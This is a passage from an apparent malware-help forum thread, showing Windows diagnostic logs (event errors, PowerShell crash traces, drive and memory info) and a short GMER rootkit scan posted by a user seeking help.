HomeGroupUser$ (S-1-5-21-3754358886-4043612072-4009104627-1007 - Limited - Enabled)
Jeremy and Heidi (S-1-5-21-3754358886-4043612072-4009104627-1001 - Administrator - Enabled) => C:\Users\Jeremy and Heidi

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/14/2014 03:31:20 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147467263 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 00:28:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x02e80e10
Faulting process id: 0x19e4
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5

Error: (10/14/2014 00:28:16 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (10/14/2014 00:27:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_wcncsvc, version: 6.2.9200.16420, time stamp: 0x505a9a4e
Faulting module name: ntdll.dll, version: 6.2.9200.16912, time stamp: 0x536464ba
Exception code: 0xc0000005
Fault offset: 0x00000000000413e0
Faulting process id: 0x15b8
Faulting application start time: 0xsvchost.exe_wcncsvc0
Faulting application path: svchost.exe_wcncsvc1
Faulting module path: svchost.exe_wcncsvc2
Report Id: svchost.exe_wcncsvc3
Faulting package full name: svchost.exe_wcncsvc4
Faulting package-relative application ID: svchost.exe_wcncsvc5

Error: (10/14/2014 00:19:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 00:13:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 11:43:42 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 11:13:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 10:43:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 10:13:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (10/14/2014 07:34:20 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 07:34:20 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 07:31:57 PM) (Source: DCOM) (EventID: 10000) (User: Toshiba_Laptop)
Description: C:\windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}2{883FF1FC-09E1-48E5-8E54-E2469ACB0CFD}

Error: (10/14/2014 07:30:36 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 07:30:35 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 03:49:26 PM) (Source: DCOM) (EventID: 10000) (User: Toshiba_Laptop)
Description: C:\windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/14/2014 03:46:19 PM) (Source: DCOM) (EventID: 10000) (User: Toshiba_Laptop)
Description: C:\windows\SysWOW64\DllHost.exe /Processid:{AD3EDBCA-0901-415B-82E9-C16D3B65E38C}2{3519154C-227E-47F3-9CC9-12C3F05817F1}

Error: (10/14/2014 03:37:25 PM) (Source: DCOM) (EventID: 10010) (User: Toshiba_Laptop)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/14/2014 03:35:25 PM) (Source: DCOM) (EventID: 10010) (User: Toshiba_Laptop)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/14/2014 03:33:25 PM) (Source: DCOM) (EventID: 10010) (User: Toshiba_Laptop)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}


Microsoft Office Sessions:
=========================
Error: (10/14/2014 03:31:20 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147467263

Error: (10/14/2014 00:28:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1638450109cceunknown0.0.0.000000000c000000502e80e1019e401cfe7e4fe74e488C:\windows\syswow64\windowspowershell\v1.0\powershell.exeunknown3eca3bc5-53d8-11e4-bec7-7054d211192a

Error: (10/14/2014 00:28:16 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (10/14/2014 00:27:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe_wcncsvc6.2.9200.16420505a9a4entdll.dll6.2.9200.16912536464bac000000500000000000413e015b801cfe758938ee950C:\windows\system32\svchost.exeC:\windows\SYSTEM32\ntdll.dll271b8be2-53d8-11e4-bec7-7054d211192a

Error: (10/14/2014 00:19:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 00:13:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 11:43:42 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 11:13:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 10:43:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 10:13:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891


CodeIntegrity Errors:
===================================
  Date: 2013-01-24 18:09:26.018
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 18:09:24.287
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 18:09:22.524
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 16:30:03.624
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 16:30:00.894
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\MMDevAPI.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info =========================== 

Processor: AMD A6-4400M APU with Radeon(tm) HD Graphics 
Percentage of memory in use: 27%
Total physical RAM: 11740.73 MB
Available physical RAM: 8469.18 MB
Total Pagefile: 23516.73 MB
Available Pagefile: 19568.83 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (TI10649600G) (Fixed) (Total:586 GB) (Free:307.85 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 596.2 GB) (Disk ID: 00000000)

Partition: GPT Partition Type.

==================== End Of Log ============================


#5 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 14 October 2014 - 11:06 PM

Ran out of room.  Here is the GMER log.  It said it couldn't look at my ntdat file and that it couldn't look at sys.config because it was being used.

GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-10-14 20:45:09
Windows 6.2.9200  x64 \Device\Harddisk0\DR0 -> \Device\00000039 Hitachi_HTS547564A9E384 rev.JEDOA60B 596.17GB
Running: vu0ul4gn.exe; Driver: C:\Users\JEREMY~1\AppData\Local\Temp\kgldrkog.sys


---- Threads - GMER 2.1 ----

Thread   C:\windows\system32\csrss.exe [7052:5708]                                                                                                  fffff9600085f5e8
